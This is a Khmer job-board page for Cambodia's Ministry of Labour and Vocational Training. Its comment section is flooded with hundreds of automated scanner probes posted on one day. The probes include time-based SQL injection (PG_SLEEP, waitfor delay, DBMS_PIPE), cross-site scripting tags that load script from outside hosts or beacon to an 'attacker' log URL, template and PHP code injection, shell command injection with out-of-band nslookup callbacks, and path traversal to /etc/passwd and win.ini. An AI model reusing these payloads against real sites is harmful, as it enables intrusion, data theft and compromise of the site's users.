ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

អគ្គនាយកដ្ឋានអប់រំបណ្តុះបណ្តាលបច្ចេកទេស និងវិជ្ជាជីវៈ
ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ មានគ្រឹះស្ថានអប់រំបណ្តុះបណ្តាលបច្ចេកទេស និងវិជ្ជាជីវៈសាធារណៈ ក្រោមឱវាទចំនួន៣៧ នៅទូទាំងប្រទេស បាននិងកំពុងផ្តល់កម្មវិធីអប់រំបណ្តុះបណ្តាលបច្ចេកទេស និងវិជ្ជាជីវៈ ទាំងវគ្គខ្លី (សិក្សារយៈពេលក្រោម ១ឆ្នាំ) និងវគ្គវែង (សិក្សារយៈពេលចាប់ពី ១ឆ្នាំឡើង) ដែលមានជំនាញបណ្តុះបណ្តាលមានដូចជា៖ សំណង់ស៊ីវិល មេកានិក អគ្គិសនីនិងថាមពល ធុរកិច្ច/ICT យន្តសាស្ត្ររថយន្ត ទេសចរណ៍និងបដិសណ្ឋារកិច្ច តបណ្តាញទឹក លោហៈបន្ទះផ្សារ ក្រឡឹង ជួសជុលម៉ាស៊ីនគ្រប់ធន់ និងកែច្នៃបន្លែផ្លៃឈើ កាត់ដេរសម្លៀកបំពាក់ សម្អាងការ និងសម្អាងកាយ។ល។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 27

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 0 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 07:32:20


  @@KgrXm


 • pHqghUme

  2021-05-06 07:32:15


  1'"


 • pHqghUme

  2021-05-06 07:32:14


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 07:31:55


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 07:31:35


  eGc7VR83')) OR 811=(SELECT 811 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:31:13


  sN5KMzLn') OR 409=(SELECT 409 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:30:46


  JEuL7SqV' OR 739=(SELECT 739 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:30:24


  -1)) OR 692=(SELECT 692 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:30:01


  -5) OR 709=(SELECT 709 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:29:34


  -5 OR 622=(SELECT 622 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:28:53


  9uYhn4AP'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:28:30


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:28:07


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:27:30


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:27:08


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 07:26:44


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 07:26:20


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 07:25:55


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 07:25:26


  -1" OR 2+365-365-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:25:25


  -1' OR 2+952-952-1=0+0+0+1 or 'qNr9dLaR'='


 • pHqghUme

  2021-05-06 07:25:23


  -1' OR 2+839-839-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:25:22


  -1 OR 2+975-975-1=0+0+0+1


 • pHqghUme

  2021-05-06 07:25:21


  -1 OR 2+582-582-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:25:20


  pBUd8wMu


 • pHqghUme

  2021-05-06 07:25:04


  1


 • pHqghUme

  2021-05-06 07:24:41


  1


 • @@LpcaD

  2021-05-06 07:24:20


  1


 • 1'"

  2021-05-06 07:24:17


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 07:24:16


  1


 • aVua7guP')) OR 892=(SELECT 892 FROM PG_SLEEP(15))--

  2021-05-06 07:23:58


  1


 • IkUH5TPz') OR 409=(SELECT 409 FROM PG_SLEEP(15))--

  2021-05-06 07:23:35


  1


 • nnoT1DvG' OR 943=(SELECT 943 FROM PG_SLEEP(15))--

  2021-05-06 07:23:14


  1


 • 9Lx7jQaL'; waitfor delay '0:0:15' --

  2021-05-06 07:22:52


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 07:22:30


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 07:22:13


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 07:21:53


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 07:21:36


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 07:21:24


  1


 • -1" OR 2+135-135-1=0+0+0+1 --

  2021-05-06 07:21:02


  1


 • -1' OR 2+251-251-1=0+0+0+1 or '0wN9q3mN'='

  2021-05-06 07:21:01


  1


 • -1' OR 2+691-691-1=0+0+0+1 --

  2021-05-06 07:20:59


  1


 • -1 OR 2+912-912-1=0+0+0+1 --

  2021-05-06 07:20:58


  1


 • -1 OR 2+457-457-1=0+0+0+1

  2021-05-06 07:20:58


  1


 • cztX2rHY

  2021-05-06 07:20:57


  1


 • pHqghUme

  2021-05-06 07:20:43


  1


 • pHqghUme

  2021-05-06 07:20:27


  1


 • pHqghUme

  2021-05-06 07:20:15


  1


 • pHqghUme

  2021-05-06 07:20:11


  1


 • pHqghUme

  2021-05-06 07:20:11


  1


 • pHqghUme

  2021-05-06 07:19:56


  1


 • pHqghUme

  2021-05-06 07:19:42


  1


 • pHqghUme

  2021-05-06 07:19:29


  1


 • pHqghUme

  2021-05-06 07:19:15


  1


 • pHqghUme

  2021-05-06 07:19:03


  1


 • pHqghUme

  2021-05-06 07:18:49


  1


 • pHqghUme

  2021-05-06 07:18:39


  1


 • pHqghUme

  2021-05-06 07:18:28


  1


 • pHqghUme

  2021-05-06 07:18:14


  1


 • pHqghUme

  2021-05-06 07:18:05


  1


 • pHqghUme

  2021-05-06 07:18:05


  1


 • pHqghUme

  2021-05-06 07:18:04


  1


 • pHqghUme

  2021-05-06 07:18:04


  1


 • pHqghUme

  2021-05-06 07:18:03


  1


 • pHqghUme

  2021-05-06 07:18:02


  1


 • pHqghUme

  2021-05-06 07:17:52


  1


 • pHqghUme

  2021-05-06 07:17:41


  1


 • pHqghUme

  2021-05-06 07:17:31


  1


 • pHqghUme

  2021-05-06 07:17:27


  1


 • pHqghUme

  2021-05-06 07:17:26


  1


 • pHqghUme

  2021-05-06 07:17:13


  1


 • pHqghUme

  2021-05-06 07:17:00


  1


 • pHqghUme

  2021-05-06 07:16:46


  1


 • pHqghUme

  2021-05-06 07:16:20


  1


 • pHqghUme

  2021-05-06 07:15:45


  1


 • pHqghUme

  2021-05-06 07:15:34


  1<d2TpK0<


 • pHqghUme

  2021-05-06 07:15:29


  1<img sRc='http://attacker-9147/log.php?


 • pHqghUme

  2021-05-06 07:15:26


  1


 • pHqghUme

  2021-05-06 07:15:24


  1<MwW0p9 x=9980>


 • pHqghUme

  2021-05-06 07:15:19


  1<ifRAme sRc=9088.com></IfRamE>


 • pHqghUme

  2021-05-06 07:15:14


  1<W412ZM>241J5[!+!]</W412ZM>


 • pHqghUme

  2021-05-06 07:15:09


  1


 • pHqghUme

  2021-05-06 07:15:09


  1pZ3iY <ScRiPt >JuXb(9021)</ScRiPt>


 • pHqghUme

  2021-05-06 07:15:01


  1<% contenteditable onresize=JuXb(9587)>


 • pHqghUme

  2021-05-06 07:14:56


  1}body{acu:Expre/**/SSion(JuXb(9622))}


 • pHqghUme

  2021-05-06 07:14:53


  1


 • pHqghUme

  2021-05-06 07:14:51


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 07:14:43


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 07:14:37


  1<input autofocus onfocus=JuXb(9754)>


 • pHqghUme

  2021-05-06 07:14:35


  1


 • pHqghUme

  2021-05-06 07:14:26


  1&lt;ScRiPt&gt;JuXb(9487)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 07:14:20


  1\u003CScRiPt\JuXb(9986)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 07:14:17


  1


 • pHqghUme

  2021-05-06 07:14:16


  1


 • pHqghUme

  2021-05-06 07:14:14


  1


 • pHqghUme

  2021-05-06 07:14:14


  1


 • pHqghUme

  2021-05-06 07:14:13


  1


 • pHqghUme

  2021-05-06 07:14:13


  %31%3C%53%63%52%69%50%74%20%3E%4A%75%58%62%289372%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 07:14:12


  1


 • pHqghUme

  2021-05-06 07:14:04


  1<img/src=">" onerror=alert(9853)>


 • pHqghUme

  2021-05-06 07:13:57


  1<img src=xyz OnErRor=JuXb(9056)>


 • pHqghUme

  2021-05-06 07:13:52


  1<img src=//xss.bxss.me/t/dot.gif onload=JuXb(9863)>


 • pHqghUme

  2021-05-06 07:13:51


  1


 • pHqghUme

  2021-05-06 07:13:46


  1<body onload=JuXb(9987)>


 • pHqghUme

  2021-05-06 07:13:40


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9213'>


 • pHqghUme

  2021-05-06 07:13:33


  1<isindex type=image src=1 onerror=JuXb(9466)>


 • pHqghUme

  2021-05-06 07:13:28


  1


 • pHqghUme

  2021-05-06 07:13:24


  1<ScRiPt >JuXb(9376)</ScRiPt>


 • pHqghUme

  2021-05-06 07:13:18


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9977></ScRiPt>


 • pHqghUme

  2021-05-06 07:13:14


  1<ScRiPt >JuXb(9305)</ScRiPt>


 • pHqghUme

  2021-05-06 07:13:08


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4A%75%58%62%28%39%30%31%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 07:13:03


  1<script>JuXb(9454)</script>


 • pHqghUme

  2021-05-06 07:12:56


  1<WLXZA7>AJVCF[!+!]</WLXZA7>


 • pHqghUme

  2021-05-06 07:12:49


  1<ScRiPt >JuXb(9501)</ScRiPt>


 • pHqghUme

  2021-05-06 07:12:43


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 07:12:36


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 07:12:30


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 07:12:23


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 07:12:17


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:12:11


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 07:12:02


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:11:52


  acux7888%C0%BEz1%C0%BCz2a%90bcxuca7888


 • pHqghUme

  2021-05-06 07:11:43


  acu6080%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6080


 • pHqghUme

  2021-05-06 07:11:35


  19138933


 • pHqghUme

  2021-05-06 07:11:26


  '"()&%<acx><ScRiPt >JuXb(9127)</ScRiPt>


 • pHqghUme

  2021-05-06 07:11:18


  1'"()&%<acx><ScRiPt >JuXb(9065)</ScRiPt>


 • pHqghUme<XChv7L<

  2021-05-06 07:11:10


  1


 • pHqghUme<img sRc='http://attacker-9230/log.php?

  2021-05-06 07:11:02


  1


 • pHqghUme<pD4qhv x=9132>

  2021-05-06 07:10:53


  1


 • pHqghUme<ifRAme sRc=9732.com></IfRamE>

  2021-05-06 07:10:43


  1


 • pHqghUme<WVDOBE>SYZPW[!+!]</WVDOBE>

  2021-05-06 07:10:28


  1


 • pHqghUmehRiPe <ScRiPt >JuXb(9667)</ScRiPt>

  2021-05-06 07:10:17


  1


 • pHqghUme<% contenteditable onresize=JuXb(9366)>

  2021-05-06 07:10:09


  1


 • pHqghUme}body{acu:Expre/**/SSion(JuXb(9872))}

  2021-05-06 07:09:58


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 07:09:48


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 07:09:39


  1


 • pHqghUme<input autofocus onfocus=JuXb(9422)>

  2021-05-06 07:09:31


  1


 • pHqghUme&lt;ScRiPt&gt;JuXb(9320)&lt;/sCripT&gt;

  2021-05-06 07:09:18


  1


 • pHqghUme\u003CScRiPt\JuXb(9750)\u003C/sCripT\u003E

  2021-05-06 07:09:11


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%4A%75%58%62%289738%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 07:09:03


  1


 • pHqghUme<img/src=">" onerror=alert(9283)>

  2021-05-06 07:08:53


  1


 • pHqghUme<img src=xyz OnErRor=JuXb(9422)>

  2021-05-06 07:08:46


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=JuXb(9578)>

  2021-05-06 07:08:37


  1


 • pHqghUme<body onload=JuXb(9119)>

  2021-05-06 07:08:28


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9415'>

  2021-05-06 07:08:18


  1


 • pHqghUme<isindex type=image src=1 onerror=JuXb(9039)>

  2021-05-06 07:08:08


  1


 • pHqghUme<ScRiPt >JuXb(9274)</ScRiPt>

  2021-05-06 07:07:57


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9711></ScRiPt>

  2021-05-06 07:07:48


  1


 • pHqghUme<ScRiPt >JuXb(9910)</ScRiPt>

  2021-05-06 07:07:41


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4A%75%58%62%28%39%33%36%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 07:07:35


  1


 • pHqghUme<script>JuXb(9015)</script>

  2021-05-06 07:07:28


  1


 • pHqghUme

  2021-05-06 07:07:22


  1


 • pHqghUme<WZZHIH>H0XT7[!+!]</WZZHIH>

  2021-05-06 07:07:20


  1


 • pHqghUme<ScRiPt >JuXb(9330)</ScRiPt>

  2021-05-06 07:07:12


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 07:07:06


  1


 • acx__${98991*97996}__::.x

  2021-05-06 07:06:58


  1


 • pHqghUme

  2021-05-06 07:06:54


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 07:06:50


  1


 • acx{{98991*97996}}xca

  2021-05-06 07:06:38


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 07:06:30


  1


 • <th:t="${acx}#foreach

  2021-05-06 07:06:23


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 07:06:15


  1


 • acux5181%C0%BEz1%C0%BCz2a%90bcxuca5181

  2021-05-06 07:06:08


  1


 • acu5741%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5741

  2021-05-06 07:06:01


  1


 • pHqghUme9444155

  2021-05-06 07:05:50


  1


 • '"()&%<acx><ScRiPt >JuXb(9291)</ScRiPt>

  2021-05-06 07:05:43


  1


 • pHqghUme'"()&%<acx><ScRiPt >JuXb(9393)</ScRiPt>

  2021-05-06 07:05:33


  1


 • pHqghUme

  2021-05-06 07:05:25


  1


 • pHqghUme

  2021-05-06 07:05:18


  1


 • pHqghUme

  2021-05-06 07:05:09


  1


 • pHqghUme

  2021-05-06 07:05:01


  1


 • pHqghUme

  2021-05-06 07:04:58


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 07:04:56


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 07:04:55


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 07:04:54


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 07:04:53


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 07:04:53


  1


 • pHqghUme

  2021-05-06 07:04:51


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • '.print(md5(31337)).'

  2021-05-06 07:04:50


  1


 • ${@print(md5(31337))}\

  2021-05-06 07:04:49


  1


 • ${@print(md5(31337))}

  2021-05-06 07:04:48


  1


 • ";print(md5(31337));$a="

  2021-05-06 07:04:46


  1


 • ';print(md5(31337));$a='

  2021-05-06 07:04:44


  1


 • pHqghUme

  2021-05-06 07:04:44


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 07:04:43


  1


 • pHqghUme

  2021-05-06 07:04:41


  1


 • pHqghUme

  2021-05-06 07:04:39


  1


 • pHqghUme

  2021-05-06 07:04:38


  1


 • pHqghUme

  2021-05-06 07:04:37


  `(nslookup hitlizikpqdsbbc33e.bxss.me||perl -e "gethostbyname('hitlizikpqdsbbc33e.bxss.me')")`


 • pHqghUme

  2021-05-06 07:04:36


  <!--


 • pHqghUme

  2021-05-06 07:04:36


  1


 • pHqghUme

  2021-05-06 07:04:36


  |(nslookup hitrjvvfmmfrh826d9.bxss.me||perl -e "gethostbyname('hitrjvvfmmfrh826d9.bxss.me')")


 • pHqghUme

  2021-05-06 07:04:34


  '"


 • pHqghUme

  2021-05-06 07:04:34


  '+'A'.concat(70-3).concat(22*4).concat(99).concat(90).concat(114).concat(73)+(require'socket' Socket.gethostbyname('hitly'+'cgsryaqed0a70.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 07:04:34


  1


 • pHqghUme

  2021-05-06 07:04:32


  1


 • pHqghUme

  2021-05-06 07:04:32


  "+"A".concat(70-3).concat(22*4).concat(120).concat(85).concat(122).concat(79)+(require"socket" Socket.gethostbyname("hittv"+"elownjtv6a7c6.bxss.me.")[3].to_s)+"


 • <!--

  2021-05-06 07:04:32


  1


 • pHqghUme

  2021-05-06 07:04:31


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:04:30


  $(nslookup hitfnktyddgbe6ec8d.bxss.me||perl -e "gethostbyname('hitfnktyddgbe6ec8d.bxss.me')")


 • '"

  2021-05-06 07:04:30


  1


 • pHqghUme

  2021-05-06 07:04:30


  1


 • '+'A'.concat(70-3).concat(22*4).concat(122).concat(71).concat(105).concat(76)+(require'socket' Socket.gethostbyname('hitdd'+'apijmolieb82b.bxss.me.')[3].to_s)+'

  2021-05-06 07:04:30


  1


 • pHqghUme

  2021-05-06 07:04:29


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:04:28


  1


 • pHqghUme

  2021-05-06 07:04:28


  (nslookup hitbgwfgofujmeecdb.bxss.me||perl -e "gethostbyname('hitbgwfgofujmeecdb.bxss.me')")


 • pHqghUme

  2021-05-06 07:04:28


  1


 • "+"A".concat(70-3).concat(22*4).concat(98).concat(83).concat(118).concat(89)+(require"socket" Socket.gethostbyname("hitiu"+"kgoyxwpxcf666.bxss.me.")[3].to_s)+"

  2021-05-06 07:04:28


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 07:04:27


  1


 • pHqghUme

  2021-05-06 07:04:26


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 07:04:26


  1


 • pHqghUme

  2021-05-06 07:04:26


  1


 • pHqghUme

  2021-05-06 07:04:26


  |echo ypdsze$()\ zbhelh\nz^xyu||a #' |echo ypdsze$()\ zbhelh\nz^xyu||a #|" |echo ypdsze$()\ zbhelh\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:04:26


  1


 • pHqghUme

  2021-05-06 07:04:24


  1


 • pHqghUme

  2021-05-06 07:04:24


  &echo zaqejj$()\ nozwjd\nz^xyu||a #' &echo zaqejj$()\ nozwjd\nz^xyu||a #|" &echo zaqejj$()\ nozwjd\nz^xyu||a #


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 07:04:24


  1


 • pHqghUme

  2021-05-06 07:04:24


  1


 • /xfs.bxss.me

  2021-05-06 07:04:23


  1


 • pHqghUme

  2021-05-06 07:04:23


  1


 • pHqghUme

  2021-05-06 07:04:22


  1


 • pHqghUme

  2021-05-06 07:04:22


  echo fmfrac$()\ mcjhjz\nz^xyu||a #' &echo fmfrac$()\ mcjhjz\nz^xyu||a #|" &echo fmfrac$()\ mcjhjz\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:04:22


  1


 • pHqghUme

  2021-05-06 07:04:22


  1


 • pHqghUme

  2021-05-06 07:04:20


  1


 • pHqghUme

  2021-05-06 07:04:18


  1


 • pHqghUme

  2021-05-06 07:04:18


  1


 • pHqghUme

  2021-05-06 07:04:18


  1


 • pHqghUme

  2021-05-06 07:04:18


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 07:04:17


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 07:04:15


  1


 • pHqghUme

  2021-05-06 07:04:14


  1


 • pHqghUme

  2021-05-06 07:04:14


  1


 • pHqghUme

  2021-05-06 07:04:14


  1


 • `(nslookup hitfwsgqvwcgo3500b.bxss.me||perl -e "gethostbyname('hitfwsgqvwcgo3500b.bxss.me')")`

  2021-05-06 07:04:13


  1


 • pHqghUme

  2021-05-06 07:04:11


  1


 • |(nslookup hitizxlhwbesl81978.bxss.me||perl -e "gethostbyname('hitizxlhwbesl81978.bxss.me')")

  2021-05-06 07:04:10


  1


 • pHqghUme

  2021-05-06 07:04:09


  1


 • pHqghUme

  2021-05-06 07:04:07


  bxss.me


 • pHqghUme

  2021-05-06 07:04:05


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 07:04:04


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 07:04:04


  '"()


 • $(nslookup hittwdatlonbq970ba.bxss.me||perl -e "gethostbyname('hittwdatlonbq970ba.bxss.me')")

  2021-05-06 07:04:04


  1


 • pHqghUme

  2021-05-06 07:04:02


  1some_inexistent_file_with_long_name%00.jpg


 • (nslookup hitpdrirydgiv2000f.bxss.me||perl -e "gethostbyname('hitpdrirydgiv2000f.bxss.me')")

  2021-05-06 07:04:02


  1


 • pHqghUme

  2021-05-06 07:04:01


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • |echo gtrgaf$()\ shpnrl\nz^xyu||a #' |echo gtrgaf$()\ shpnrl\nz^xyu||a #|" |echo gtrgaf$()\ shpnrl\nz^xyu||a #

  2021-05-06 07:04:01


  1


 • pHqghUme

  2021-05-06 07:03:59


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • bxss.me

  2021-05-06 07:03:59


  1


 • &echo tmmtas$()\ yjxjcr\nz^xyu||a #' &echo tmmtas$()\ yjxjcr\nz^xyu||a #|" &echo tmmtas$()\ yjxjcr\nz^xyu||a #

  2021-05-06 07:03:59


  1


 • '"()

  2021-05-06 07:03:58


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 07:03:57


  1


 • echo gbbbyj$()\ jzmvvb\nz^xyu||a #' &echo gbbbyj$()\ jzmvvb\nz^xyu||a #|" &echo gbbbyj$()\ jzmvvb\nz^xyu||a #

  2021-05-06 07:03:57


  1


 • pHqghUme

  2021-05-06 07:03:56


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 07:03:55


  1&n904591=v985071


 • pHqghUme

  2021-05-06 07:03:55


  !(()&&!|*|*|


 • Http://bxss.me/t/fit.txt

  2021-05-06 07:03:55


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 07:03:54


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 07:03:53


  1


 • pHqghUme

  2021-05-06 07:03:53


  )


 • pHqghUme

  2021-05-06 07:03:53


  ".gethostbyname(lc("hitbe"."spnzmeqmcd547.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(81).chr(117).chr(85)."


 • pHqghUme

  2021-05-06 07:03:52


  '.gethostbyname(lc('hitxp'.'uzzwport53721.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(80).chr(116).chr(78).'


 • pHqghUme

  2021-05-06 07:03:52


  1


 • ^(#$!@#$)(()))******

  2021-05-06 07:03:52


  1


 • pHqghUme

  2021-05-06 07:03:51


  1


 • pHqghUme

  2021-05-06 07:03:51


  1


 • pHqghUme

  2021-05-06 07:03:50


  1


 • ".gethostbyname(lc("hitdm"."kororpfe696cb.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(88).chr(103).chr(65)."

  2021-05-06 07:03:50


  1


 • !(()&&!|*|*|

  2021-05-06 07:03:50


  1


 • '.gethostbyname(lc('hitbc'.'okjwdsqd06af9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(89).chr(98).chr(78).'

  2021-05-06 07:03:49


  1


 • pHqghUme

  2021-05-06 07:03:49


  1


 • pHqghUme

  2021-05-06 07:03:48


  1


 • )

  2021-05-06 07:03:48


  1


 • pHqghUme

  2021-05-06 07:03:47


  1


 • pHqghUme&n953290=v954689

  2021-05-06 07:03:47


  1


 • pHqghUme

  2021-05-06 07:03:47


  1


 • pHqghUme

  2021-05-06 07:03:46


  1


 • pHqghUme

  2021-05-06 07:03:45


  1


 • pHqghUme

  2021-05-06 07:03:45


  1


 • pHqghUme

  2021-05-06 07:03:45


  1


 • pHqghUme

  2021-05-06 07:03:45


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 07:03:45


  1


 • pHqghUme

  2021-05-06 07:03:44


  1


 • pHqghUme

  2021-05-06 07:03:43


  1


 • pHqghUme

  2021-05-06 07:03:43


  1


 • pHqghUme

  2021-05-06 07:03:43


  1


 • pHqghUme

  2021-05-06 07:03:42


  1


 • pHqghUme

  2021-05-06 07:03:42


  1


 • pHqghUme

  2021-05-06 07:03:42


  1


 • pHqghUme

  2021-05-06 07:03:42


  1


 • pHqghUme

  2021-05-06 07:03:41


  1


 • pHqghUme

  2021-05-06 07:03:40


  1


 • pHqghUme

  2021-05-06 07:03:40


  1


 • pHqghUme

  2021-05-06 07:03:40


  1


 • pHqghUme

  2021-05-06 07:03:39


  1


 • pHqghUme

  2021-05-06 07:03:38


  1


 • pHqghUme

  2021-05-06 07:03:38


  1


 • pHqghUme

  2021-05-06 07:03:36


  1


 • pHqghUme

  2021-05-06 07:03:36


  1


 • pHqghUme

  2021-05-06 07:03:35


  ../1


 • pHqghUme

  2021-05-06 07:03:34


  1


 • pHqghUme

  2021-05-06 07:03:33


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 07:03:32


  1


 • pHqghUme

  2021-05-06 07:03:31


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 07:03:29


  1


 • ../pHqghUme

  2021-05-06 07:03:29


  1


 • pHqghUme

  2021-05-06 07:03:28


  1


 • RGV3WHdUbDQ=

  2021-05-06 07:03:28


  1


 • pHqghUme

  2021-05-06 07:03:28


  1


 • pHqghUme

  2021-05-06 07:03:27


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 07:03:26


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 07:03:24


  1


 • pHqghUme

  2021-05-06 07:03:23


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 07:03:22


  ${9999121+9999407}


 • pHqghUme

  2021-05-06 07:03:22


  1


 • pHqghUme

  2021-05-06 07:03:21


  1


 • pHqghUme

  2021-05-06 07:03:21


  1


 • ${9999178+9999794}

  2021-05-06 07:03:21


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 07:03:21


  1


 • pHqghUme

  2021-05-06 07:03:20


  1


 • pHqghUme

  2021-05-06 07:03:19


  1


 • pHqghUme

  2021-05-06 07:03:19


  1


 • pHqghUme

  2021-05-06 07:03:19


  1


 • pHqghUme

  2021-05-06 07:03:18


  1


 • pHqghUme

  2021-05-06 07:03:18


  1


 • pHqghUme

  2021-05-06 07:03:18


  1


 • pHqghUme

  2021-05-06 07:03:17


  1


 • pHqghUme

  2021-05-06 07:03:16


  1


 • pHqghUme

  2021-05-06 07:03:16


  1


 • pHqghUme

  2021-05-06 07:03:14


  1


 • pHqghUme

  2021-05-06 07:03:13


  "+response.write(9706308*9858853)+"


 • pHqghUme

  2021-05-06 07:03:13


  1


 • pHqghUme

  2021-05-06 07:03:13


  1


 • pHqghUme

  2021-05-06 07:03:11


  1


 • pHqghUme

  2021-05-06 07:03:11


  1


 • pHqghUme

